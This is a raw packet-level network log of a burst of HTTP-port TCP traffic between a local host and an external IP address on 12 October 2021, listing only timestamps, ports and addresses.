Oct 12, 2021 12:35:38.909374952 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.909379005 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909404993 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909427881 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909449100 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909471989 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909482002 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.909495115 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909521103 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909543991 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909547091 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.909567118 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909590006 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909610033 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909620047 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.909631968 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909653902 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909657955 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.909676075 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909699917 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909712076 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.909723043 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909744978 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909766912 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909775972 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.909790993 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909807920 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.909807920 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909832954 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909854889 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909878969 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909887075 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.909903049 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909924984 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909946918 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909951925 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.909967899 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909992933 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.909996033 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.910016060 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.910037041 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.910058022 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.910065889 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.910079002 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.910118103 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.910134077 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.910139084 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.910161018 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.910186052 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.910188913 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.910208941 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.910231113 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.910240889 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.910252094 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.910275936 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.910298109 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.910307884 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.910320044 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.910325050 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.910342932 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.910387039 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.910413980 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.910769939 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.933486938 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.933516979 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.933662891 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.936232090 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.936264992 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.936291933 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.936383963 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.936395884 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.936405897 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.936428070 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.936444044 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.936450958 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.936470032 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.936486959 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.936507940 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.936523914 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.936547995 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.936569929 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.936585903 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.936605930 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.936621904 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.936641932 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.936661959 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.936680079 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.936701059 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.936719894 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.936743975 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.936767101 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.936784983 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.936803102 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.936820984 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.936835051 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.936853886 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.936873913 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.936891079 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.936912060 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.936937094 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.936959982 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.936979055 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.936979055 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.936999083 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.937000990 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937002897 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.937005997 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.937009096 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.937011957 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.937015057 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.937017918 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.937022924 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937041044 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937058926 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937084913 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937107086 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937128067 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937149048 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937166929 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937180996 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.937187910 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.937191963 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937191963 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.937216997 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937238932 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937254906 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.937262058 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937278986 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937304974 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937330961 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937333107 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.937352896 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937375069 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937397957 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937407970 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.937419891 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937429905 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.937443018 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937463999 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937489033 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937506914 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.937510967 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937531948 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937546015 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.937555075 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937576056 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937597036 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937613964 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.937617064 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937638044 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937661886 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937685013 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937699080 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.937705994 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937717915 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.937727928 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937750101 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937771082 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937777042 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.937793016 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937814951 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937840939 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937863111 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937875986 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.937886000 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937886000 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.937906027 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937927961 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937941074 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.937948942 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937969923 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.937990904 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.938004017 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.938014984 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.938039064 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.938049078 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.938060999 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.938083887 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.938105106 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.938121080 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.938123941 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.938146114 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.938165903 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.938183069 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.938199043 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.938220024 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.938239098 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.938266039 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.938292027 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.938314915 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.938338041 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.938359976 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.938383102 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.938405037 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.938427925 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.938472986 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.938489914 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.938493967 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.938497066 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.938502073 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.938767910 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.962944031 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.963279963 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.964355946 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.964526892 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.964602947 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.964653969 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.965051889 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.965061903 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.965100050 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.965133905 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.965157986 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.965178967 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.965200901 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.965214968 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.965220928 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.965241909 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.965264082 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.965285063 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.965301037 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.965322018 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.965331078 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.965342045 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.965362072 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.965373039 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.965383053 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.965430975 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.965455055 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.965473890 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.965497017 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.965511084 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.965517044 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.965518951 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.965540886 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.965563059 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.965584040 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.965604067 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.965615034 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.965625048 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.965645075 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.965667963 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.965689898 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.965699911 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.965711117 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.965732098 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.965751886 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.965768099 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.965775013 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.965795994 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.965811968 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.965816021 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.965841055 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.965863943 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.965873003 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.965886116 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.965908051 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.965918064 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.965930939 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.965950966 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.965965033 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.965970039 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.965991020 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966016054 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966038942 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966053009 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.966061115 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966082096 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966094971 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.966101885 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966123104 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966142893 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966152906 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.966166973 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966192961 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966214895 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966226101 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.966237068 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966257095 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966270924 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.966280937 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966303110 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966325045 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966327906 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.966345072 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966370106 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966393948 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966413975 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966437101 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966459036 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966480970 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966501951 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966523886 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966550112 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966573000 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966594934 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966615915 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966638088 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966664076 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966686010 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966710091 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966733932 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966757059 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966778994 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966799021 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966821909 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966833115 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.966844082 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966850996 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.966855049 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.966856956 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.966861010 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.966864109 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.966866016 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966867924 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.966871023 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.966873884 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.966887951 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966912031 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.966917992 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.966979980 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.967004061 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.967015982 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.967021942 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.967025042 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.967044115 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.967067003 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.967088938 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.967139959 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.967175007 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.967180967 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.967205048 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.967587948 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.989993095 CEST	80	49749	195.133.18.140	192.168.2.6
